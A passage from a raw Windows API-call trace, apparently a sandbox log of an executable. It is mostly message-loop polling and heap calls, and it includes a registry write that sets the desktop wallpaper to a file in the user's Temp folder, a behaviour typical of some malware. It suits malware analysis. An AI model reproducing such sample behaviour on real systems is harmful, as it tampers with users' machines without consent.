| out: lpMsg=0x8bf7a0) returned 0 [0296.697] Sleep (dwMilliseconds=0xa) [0296.712] timeGetTime () returned 0x4a284 [0296.712] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0296.712] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0296.713] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0296.713] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0296.713] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0296.713] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.713] Sleep (dwMilliseconds=0xa) [0296.728] timeGetTime () returned 0x4a294 [0296.728] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.728] Sleep (dwMilliseconds=0xa) [0296.744] timeGetTime () returned 0x4a2a3 [0296.744] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.744] Sleep (dwMilliseconds=0xa) [0296.759] timeGetTime () returned 0x4a2b3 [0296.759] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.759] Sleep (dwMilliseconds=0xa) [0296.775] timeGetTime () returned 0x4a2c3 [0296.775] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.775] Sleep (dwMilliseconds=0xa) [0296.790] timeGetTime () returned 0x4a2d2 [0296.790] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.790] Sleep (dwMilliseconds=0xa) [0296.806] timeGetTime () returned 0x4a2e2 [0296.806] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.806] Sleep (dwMilliseconds=0xa) [0296.830] timeGetTime () returned 0x4a2f1 [0296.830] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.830] Sleep (dwMilliseconds=0xa) [0296.837] timeGetTime () returned 0x4a301 [0296.837] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.837] Sleep (dwMilliseconds=0xa) [0296.853] timeGetTime () returned 0x4a311 [0296.853] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.853] Sleep (dwMilliseconds=0xa) [0296.869] timeGetTime () returned 0x4a320 [0296.869] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.869] Sleep (dwMilliseconds=0xa) [0296.888] timeGetTime () returned 0x4a330 [0296.888] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.888] Sleep (dwMilliseconds=0xa) [0296.906] timeGetTime () returned 0x4a33f [0296.906] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.906] Sleep (dwMilliseconds=0xa) [0296.915] timeGetTime () returned 0x4a34f [0296.915] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.915] Sleep (dwMilliseconds=0xa) [0296.931] timeGetTime () returned 0x4a35f [0296.931] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.931] Sleep (dwMilliseconds=0xa) [0296.946] timeGetTime () returned 0x4a36e [0296.947] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.947] Sleep (dwMilliseconds=0xa) [0296.969] timeGetTime () returned 0x4a37e [0296.969] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.969] Sleep (dwMilliseconds=0xa) [0296.981] timeGetTime () returned 0x4a38d [0296.981] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.981] Sleep (dwMilliseconds=0xa) [0296.993] timeGetTime () returned 0x4a39d [0296.993] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0296.993] Sleep (dwMilliseconds=0xa) [0297.019] timeGetTime () returned 0x4a3ad [0297.019] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.019] Sleep (dwMilliseconds=0xa) [0297.024] timeGetTime () returned 0x4a3bc [0297.025] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.025] Sleep (dwMilliseconds=0xa) [0297.043] timeGetTime () returned 0x4a3cc [0297.043] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.043] Sleep (dwMilliseconds=0xa) [0297.056] timeGetTime () returned 0x4a3db [0297.056] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.056] Sleep (dwMilliseconds=0xa) [0297.071] timeGetTime () returned 0x4a3eb [0297.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0297.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0297.072] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0297.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0297.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0297.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0297.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0297.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0297.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0297.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0297.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0297.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0297.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0297.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0297.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0297.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0297.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0297.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0297.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0297.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0297.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0297.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0297.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0297.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0297.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0297.073] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0297.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0297.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0297.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0297.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0297.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0297.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0297.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0297.073] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0297.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0297.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0297.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0297.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0297.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0297.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0297.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0297.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0297.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0297.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0297.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0297.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0297.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0297.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0297.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0297.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0297.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0297.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0297.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0297.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0297.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0297.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0297.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0297.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0297.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0297.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0297.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0297.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0297.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0297.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0297.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0297.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0297.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0297.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0297.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0297.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0297.075] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0297.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0297.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0297.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0297.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0297.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0297.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0297.075] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0297.076] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0297.076] RegCloseKey (hKey=0x294) returned 0x0 [0297.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0297.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0297.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0297.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0297.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0297.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0297.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0297.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0297.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0297.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0297.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0297.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0297.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0297.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0297.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0297.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0297.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0297.078] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0297.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0297.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0297.079] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0297.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0297.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0297.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0297.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18f8 [0297.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0297.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0297.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0297.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0297.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0297.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0297.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0297.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0297.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0297.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0297.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0297.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0297.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0297.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0297.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0297.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0297.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa778 [0297.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0297.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0297.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0297.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0297.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0297.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0297.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0297.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0297.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0297.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0297.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0297.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0297.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0297.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0297.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0297.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0297.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0297.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0297.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0297.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0297.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0297.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0297.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0297.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0297.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0297.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0297.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0297.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0297.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0297.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0297.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0297.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0297.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0297.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0297.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0297.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0297.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0297.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0297.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0297.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0297.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0297.082] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0297.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0297.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0297.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0297.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0297.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0297.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0297.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0297.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0297.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0297.082] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0297.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0297.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0297.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 